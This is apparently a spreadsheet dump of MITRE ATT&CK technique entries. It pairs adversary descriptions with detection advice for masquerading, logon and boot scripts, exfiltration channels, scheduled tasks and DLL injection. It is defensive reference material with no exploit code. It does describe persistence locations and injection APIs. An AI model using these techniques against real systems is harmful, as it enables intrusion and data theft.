If file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Endgame Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)</t>
  </si>
  <si>
    <t>Adversaries may match or approximate the name or location of legitimate files when naming/placing their files. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). Alternatively, the filename given may be a close approximation of legitimate programs or something innocuous.
Adversaries may also use the same icon of the file they are trying to mimic.</t>
  </si>
  <si>
    <t>T1036.006</t>
  </si>
  <si>
    <t>Space after Filename</t>
  </si>
  <si>
    <t>It's not common for spaces to be at the end of filenames, so this is something that can easily be checked with file monitoring. From the user's perspective though, this is very hard to notice from within the Finder.app or on the command-line in Terminal.app. Processes executed from binaries containing non-standard extensions in the filename are suspicious.</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</si>
  <si>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&lt;code&gt;evil.bin&lt;/code&gt;, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to &lt;code&gt;evil.txt&lt;/code&gt;, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to &lt;code&gt;evil.txt &lt;/code&gt;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t>
  </si>
  <si>
    <t>Boot or Logon Initialization Scripts</t>
  </si>
  <si>
    <t>macOS,Windows,Linux</t>
  </si>
  <si>
    <t>Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.</t>
  </si>
  <si>
    <t>Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely.  
Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. 
An adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.</t>
  </si>
  <si>
    <t>T1037.001</t>
  </si>
  <si>
    <t>Logon Script (Windows)</t>
  </si>
  <si>
    <t>Process monitoring,Windows Registry</t>
  </si>
  <si>
    <t>Monitor for changes to Registry values associated with Windows logon scrips, nameley &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt;.
Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system.(Citation: TechNet Logon Scripts) This is done via adding a path to a script to the &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt; Registry key.(Citation: Hexacorn Logon Scripts)
Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. </t>
  </si>
  <si>
    <t>T1037.002</t>
  </si>
  <si>
    <t>Logon Script (Mac)</t>
  </si>
  <si>
    <t>Process monitoring,File monitoring</t>
  </si>
  <si>
    <t>macOS</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use macOS logon scripts automatically executed at logon initialization to establish persistence. macOS allows logon scripts (known as login hooks) to be executed whenever a specific user logs into a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike [Startup Items](https://attack.mitre.org/techniques/T1037/005), a login hook executes as the elevated root user.(Citation: creating login hook)
Adversaries may use these login hooks to maintain persistence on a single system.(Citation: S1 macOs Persistence) Access to login hook scripts may allow an adversary to insert additional malicious code. There can only be one login hook at a time though and depending on the access configuration of the hooks, either local credentials or an administrator account may be necessary. </t>
  </si>
  <si>
    <t>T1037.003</t>
  </si>
  <si>
    <t>Network Logon Script</t>
  </si>
  <si>
    <t>Adversaries may use network logon scripts automatically executed at logon initialization to establish persistence. Network logon scripts can be assigned using Active Directory or Group Policy Objects.(Citation: Petri Logon Script AD) These logon scripts run with the privileges of the user they are assigned to. Depending on the systems within the network, initializing one of these scripts could apply to more than one or potentially all systems.  
Adversaries may use these scripts to maintain persistence on a network. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.</t>
  </si>
  <si>
    <t>T1037.004</t>
  </si>
  <si>
    <t>Rc.common</t>
  </si>
  <si>
    <t xml:space="preserve">The &lt;code&gt;/etc/rc.common&lt;/code&gt; file can be monitored to detect changes from the company policy. Monitor process execution resulting from the rc.common script for unusual or unknown applications or behavior. </t>
  </si>
  <si>
    <t>Adversaries may use rc.common automatically executed at boot initialization to establish persistence. During the boot process, macOS executes &lt;code&gt;source /etc/rc.common&lt;/code&gt;, which is a shell script containing various utility functions. This file also defines routines for processing command-line arguments and for gathering system settings and is thus recommended to include in the start of Startup Item Scripts (Citation: Startup Items). In macOS and OS X, this is now a deprecated mechanism in favor of [Launch Agent](https://attack.mitre.org/techniques/T1543/001) and [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) but is currently still used.
Adversaries can use the rc.common file as a way to hide code for persistence that will execute on each reboot as the root user. (Citation: Methods of Mac Malware Persistence)</t>
  </si>
  <si>
    <t>T1037.005</t>
  </si>
  <si>
    <t>Startup Items</t>
  </si>
  <si>
    <t>The &lt;code&gt;/Library/StartupItems&lt;/code&gt; folder can be monitored for changes. Similarly, the programs that are actually executed from this mechanism should be checked against a whitelist.
Monitor processes that are executed during the bootup process to check for unusual or unknown applications and behavior.</t>
  </si>
  <si>
    <t>Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items. (Citation: Startup Items)
This is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)),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 (Citation: Methods of Mac Malware Persistence). Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user.</t>
  </si>
  <si>
    <t>Data from Network Shared Drive</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to collect files from a network share.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</si>
  <si>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t>
  </si>
  <si>
    <t>Network Sniffing</t>
  </si>
  <si>
    <t>Network device logs,Host network interface,Netflow/Enclave netflow,Process monitoring</t>
  </si>
  <si>
    <t>Detecting the events leading up to sniffing network traffic may be the best method of detection. From the host level, an adversary would likely need to perform a man-in-the-middle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t>
  </si>
  <si>
    <t>Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. 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 and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.
Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.</t>
  </si>
  <si>
    <t>credential-access,discovery</t>
  </si>
  <si>
    <t>Exfiltration Over C2 Channel</t>
  </si>
  <si>
    <t>Packet capture,Process use of network,Netflow/Enclave netflow,Process monitoring</t>
  </si>
  <si>
    <t>Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.</t>
  </si>
  <si>
    <t>Commonly Used Port</t>
  </si>
  <si>
    <t>**This technique has been deprecated. Please use [Non-Standard Port](https://attack.mitre.org/techniques/T1571) where appropriate.**
Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection. They may use commonly open ports such as
* TCP:80 (HTTP)
* TCP:443 (HTTPS)
* TCP:25 (SMTP)
* TCP/UDP:53 (DNS)
They may use the protocol associated with the port or a completely different protocol. 
For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), examples of common ports are 
* TCP/UDP:135 (RPC)
* TCP/UDP:22 (SSH)
* TCP/UDP:3389 (RDP)</t>
  </si>
  <si>
    <t>Network Service Scanning</t>
  </si>
  <si>
    <t>Netflow/Enclave netflow,Network protocol analysis,Packet capture,Process command-line parameters,Process use of network</t>
  </si>
  <si>
    <t>Linux,Windows,macOS,AWS,GCP,Azure</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</si>
  <si>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from legitimate remote service scanning may be uncommon, depending on the environment and how they are used. Legitimate open port and vulnerability scanning may be conducted within the environment and will need to be deconflicted with any detection capabilities developed. Network intrusion detection systems can also be used to identify scanning activity. Monitor for process use of the networks and inspect intra-network flows to detect port scans.</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system. 
Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.</t>
  </si>
  <si>
    <t>Windows Management Instrumentation</t>
  </si>
  <si>
    <t>Authentication logs,Netflow/Enclave netflow,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Monitor network traffic for WMI connections; the use of WMI in environments that do not typically use WMI may be suspect. Perform process monitoring to capture command-line arguments of "wmic" and detect commands that are used to perform remote behavior. (Citation: FireEye WMI 2015)</t>
  </si>
  <si>
    <t>Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) (Citation: Wikipedia SMB) and Remote Procedure Call Service (RPCS) (Citation: TechNet RPC) for remote access. RPCS operates over port 135. (Citation: MSDN WMI)
An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)</t>
  </si>
  <si>
    <t>execution</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol</t>
  </si>
  <si>
    <t>Process monitoring,Process use of network,Packet capture,Netflow/Enclave netflow,Network protocol analysis</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.  
Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different protocol channels could also include Web services such as cloud storage. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. 
[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) </t>
  </si>
  <si>
    <t>T1048.001</t>
  </si>
  <si>
    <t>Exfiltration Over Symmetric Encrypted Non-C2 Protocol</t>
  </si>
  <si>
    <t>Malware reverse engineering,Network protocol analysis,Netflow/Enclave netflow,Packet capture,Process use of network</t>
  </si>
  <si>
    <t xml:space="preserve">Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2) 
Artifacts and evidence of symmetric key exchange may be recoverable by analyzing network traffic or looking for hard-coded values within malware. If recovered, these keys can be used to decrypt network data from command and control channels. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. 
Symmetric encryption algorithms are those that use shared or the same keys/secrets on each end of the channel. This requires an exchange or pre-arranged agreement/possession of the value used to encrypt and decrypt data. 
Network protocols that use asymmetric encryption often utilize symmetric encryption once keys are exchanged, but adversaries may opt to manually share keys and implement symmetric cryptographic algorithms (ex: RC4, AES) vice using mechanisms that are baked into a protocol. This may result in multiple layers of encryption (in protocols that are natively encrypted such as HTTPS) or encryption in protocols that not typically encrypted (such as HTTP or FTP). </t>
  </si>
  <si>
    <t>T1048.002</t>
  </si>
  <si>
    <t>Exfiltration Over Asymmetric Encrypted Non-C2 Protocol</t>
  </si>
  <si>
    <t>Network protocol analysis,Netflow/Enclave netflow,Packet capture,Process use of network</t>
  </si>
  <si>
    <t xml:space="preserve">Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2) </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. 
Asymmetric encryption algorithms are those that use different keys on each end of the channel. Also known as public-key cryptography, this requires pairs of cryptographic keys that can encrypt/decrypt data from the corresponding key. Each end of the communication channels requires a private key (only in the procession of that entity) and the public key of the other entity. The public keys of each entity are exchanged before encrypted communications begin. 
Network protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize symmetric encryption once keys are exchanged. Adversaries may opt to use these encrypted mechanisms that are baked into a protocol. </t>
  </si>
  <si>
    <t>T1048.003</t>
  </si>
  <si>
    <t>Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol</t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. 
Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. </t>
  </si>
  <si>
    <t>System Network Connections Discovery</t>
  </si>
  <si>
    <t>Linux,macOS,Windows,AWS,GCP,Azure</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</si>
  <si>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t>
  </si>
  <si>
    <t>Shared Webroot</t>
  </si>
  <si>
    <t>Use file and process monitoring to detect when files are written to a Web server by a process that is not the normal Web server process or when files are written outside of normal administrative time periods. Use process monitoring to identify normal processes that run on the Web server and detect processes that are not typically executed.</t>
  </si>
  <si>
    <t>**This technique has been deprecated and should no longer be used.**
Adversaries may add malicious content to an internally accessible website through an open network file share that contains the website's webroot or Web content directory (Citation: Microsoft Web Root OCT 2016) (Citation: Apache Server 2018)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
This mechanism of shared access and remote execution could be used for lateral movement to the system running the Web server. For example, a Web server running PHP with an open network share could allow an adversary to upload a remote access tool and PHP script to execute the RAT on the system running the Web server when a specific page is visited. (Citation: Webroot PHP 2011)</t>
  </si>
  <si>
    <t>Exfiltration Over Physical Medium</t>
  </si>
  <si>
    <t>Process monitoring,Data loss prevention,File monitoring</t>
  </si>
  <si>
    <t>Monitor file access on removable media. Detect processes that execute when removable media are mounted.</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</si>
  <si>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</si>
  <si>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T1052.001</t>
  </si>
  <si>
    <t>Exfiltration over USB</t>
  </si>
  <si>
    <t>Adversaries may attempt to exfiltrate data over a USB connected physical device. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a USB device introduced by a user. The USB device could be used as the final exfiltration point or to hop between otherwise disconnected systems.</t>
  </si>
  <si>
    <t>Scheduled Task/Job</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Process command-line parameters,Windows event logs</t>
  </si>
  <si>
    <t>Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. 
Suspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</t>
  </si>
  <si>
    <t>Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).</t>
  </si>
  <si>
    <t>execution,persistence,privilege-escalation</t>
  </si>
  <si>
    <t>T1053.001</t>
  </si>
  <si>
    <t>At (Linux)</t>
  </si>
  <si>
    <t>Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Monitor scheduled task creation using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. 
Suspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</t>
  </si>
  <si>
    <t>Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) command within Linux operating systems enables administrators to schedule tasks.(Citation: Kifarunix - Task Scheduling in Linux)
An adversary may use [at](https://attack.mitre.org/software/S0110) in Linux environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account.</t>
  </si>
  <si>
    <t>T1053.002</t>
  </si>
  <si>
    <t>At (Windows)</t>
  </si>
  <si>
    <t>File monitoring,Process command-line parameters,Process monitoring,Windows event logs</t>
  </si>
  <si>
    <t>Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.
Configure event logging for scheduled task creation and changes by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)
* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered
* Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated
* Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted
* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created
* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled
* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.</t>
  </si>
  <si>
    <t>Adversaries may abuse the &lt;code&gt;at.exe&lt;/code&gt; utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows for scheduling tasks at a specified time and date. Using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. 
An adversary may use &lt;code&gt;at.exe&lt;/code&gt; in Windows environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM).
Note: The &lt;code&gt;at.exe&lt;/code&gt; command line utility has been deprecated in current versions of Windows in favor of &lt;code&gt;schtasks&lt;/code&gt;.</t>
  </si>
  <si>
    <t>T1053.003</t>
  </si>
  <si>
    <t>Cron</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc.  
Suspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. </t>
  </si>
  <si>
    <t>Adversaries may abuse the &lt;code&gt;cron&lt;/code&gt; utility to perform task scheduling for initial or recurring execution of malicious code. The &lt;code&gt;cron&lt;/code&gt; utility is a time-based job scheduler for Unix-like operating systems.  The &lt;code&gt; crontab&lt;/code&gt; file contains the schedule of cron entries to be run and the specified times for execution. Any &lt;code&gt;crontab&lt;/code&gt; files are stored in operating system-specific file paths.
An adversary may use &lt;code&gt;cron&lt;/code&gt; in Linux or Unix environments to execute programs at system startup or on a scheduled basis for persistence. &lt;code&gt;cron&lt;/code&gt; can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account.</t>
  </si>
  <si>
    <t>T1053.004</t>
  </si>
  <si>
    <t>Launchd</t>
  </si>
  <si>
    <t>Process command-line parameters,File monitoring,Process monitoring</t>
  </si>
  <si>
    <t>Adversaries may abuse the &lt;code&gt;Launchd&lt;/code&gt; daemon to perform task scheduling for initial or recurring execution of malicious code. The &lt;code&gt;launchd&lt;/code&gt; daemon, native to macOS, is responsible for loading and maintaining services within the operating system. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in &lt;code&gt;/System/Library/LaunchDaemons&lt;/code&gt; and &lt;code&gt;/Library/LaunchDaemons&lt;/code&gt; (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence).
An adversary may use the &lt;code&gt;launchd&lt;/code&gt; daemon in macOS environments to schedule new executables to run at system startup or on a scheduled basis for persistence. &lt;code&gt;launchd&lt;/code&gt; can also be abused to run a process under the context of a specified account. Daemons, such as &lt;code&gt;launchd&lt;/code&gt;, run with the permissions of the root user account, and will operate regardless of which user account is logged in.</t>
  </si>
  <si>
    <t>T1053.005</t>
  </si>
  <si>
    <t>Scheduled Task</t>
  </si>
  <si>
    <t>Monitor process execution from the &lt;code&gt;svchost.exe&lt;/code&gt; in Windows 10 and the Windows Task Scheduler &lt;code&gt;taskeng.exe&lt;/code&gt; for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.
Configure event logging for scheduled task creation and changes by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)
* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered
* Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated
* Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted
* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created
* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled
* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.</t>
  </si>
  <si>
    <t>Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The &lt;code&gt;schtasks&lt;/code&gt; can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.
The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At (Windows)](https://attack.mitre.org/techniques/T1053/002)), though &lt;code&gt;at.exe&lt;/code&gt; can not access tasks created with &lt;code&gt;schtasks&lt;/code&gt; or the Control Panel.
An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM).</t>
  </si>
  <si>
    <t>T1053.006</t>
  </si>
  <si>
    <t>Systemd Timers</t>
  </si>
  <si>
    <t>Systemd timer unit files may be detected by auditing file creation and modification events within the &lt;code&gt;/etc/systemd/system&lt;/code&gt;, &lt;code&gt;/usr/lib/systemd/system/&lt;/code&gt;, and &lt;code&gt;~/.config/systemd/user/&lt;/code&gt; directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user.
Suspicious systemd timers can also be identified by comparing results against a trusted system baseline. Malicious systemd timers may be detected by using the systemctl utility to examine system wide timers: &lt;code&gt;systemctl list-timers –all&lt;/code&gt;. Analyze the contents of corresponding &lt;code&gt;.service&lt;/code&gt; files present on the file system and ensure that they refer to legitimate, expected executables.
Audit the execution and command-line arguments of the 'systemd-run' utility as it may be used to create timers.(Citation: archlinux Systemd Timers Aug 2020)</t>
  </si>
  <si>
    <t>Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension &lt;code&gt;.timer&lt;/code&gt; that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020)
Each &lt;code&gt;.timer&lt;/code&gt; file must have a corresponding &lt;code&gt;.service&lt;/code&gt; file with the same name, e.g., &lt;code&gt;example.timer&lt;/code&gt; and &lt;code&gt;example.service&lt;/code&gt;. &lt;code&gt;.service&lt;/code&gt; files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to &lt;code&gt;/etc/systemd/system/&lt;/code&gt; and &lt;code&gt;/usr/lib/systemd/system&lt;/code&gt; while user level are written to &lt;code&gt;~/.config/systemd/user/&lt;/code&gt;.
An adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.</t>
  </si>
  <si>
    <t>Process Injection</t>
  </si>
  <si>
    <t>API monitoring,File monitoring,DLL monitoring,Process monitoring,Named Pipes</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</si>
  <si>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&lt;code&gt;SuspendThread&lt;/code&gt;/&lt;code&gt;SetThreadContext&lt;/code&gt;/&lt;code&gt;ResumeThread&lt;/code&gt;, &lt;code&gt;QueueUserAPC&lt;/code&gt;/&lt;code&gt;NtQueueApcThread&lt;/code&gt;, and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be used for this technique.(Citation: Endgame Process Injection July 2017) 
Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. 
Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics)  (Citation: GNU Acct)  (Citation: RHEL auditd)  (Citation: Chokepoint preload rootkits) 
Monitor for named pipe creation and connection events (Event IDs 17 and 18) for possible indicators of infected processes with external modules.(Citation: Microsoft Sysmon v6 May 2017) 
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>defense-evasion,privilege-escalation</t>
  </si>
  <si>
    <t>Application control,Anti-virus</t>
  </si>
  <si>
    <t>T1055.001</t>
  </si>
  <si>
    <t>Dynamic-link Library Injection</t>
  </si>
  <si>
    <t>Process monitoring,DLL monitoring,File monitoring,API monitoring</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</si>
  <si>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and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be used for this technique.(Citation: Endgame Process Injection July 2017)
Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. 
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process.  
DLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as &lt;code&gt;VirtualAllocEx&lt;/code&gt; and &lt;code&gt;WriteProcessMemory&lt;/code&gt;, then invoked with &lt;code&gt;CreateRemoteThread&lt;/code&gt; (which calls the &lt;code&gt;LoadLibrary&lt;/code&gt; API responsible for loading the DLL). (Citation: Endgame Process Injection July 2017) 
Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of &lt;code&gt;LoadLibrary&lt;/code&gt;).(Citation: Endgame HuntingNMemory June 2017)(Citation: Endgame Process Injection July 2017) 
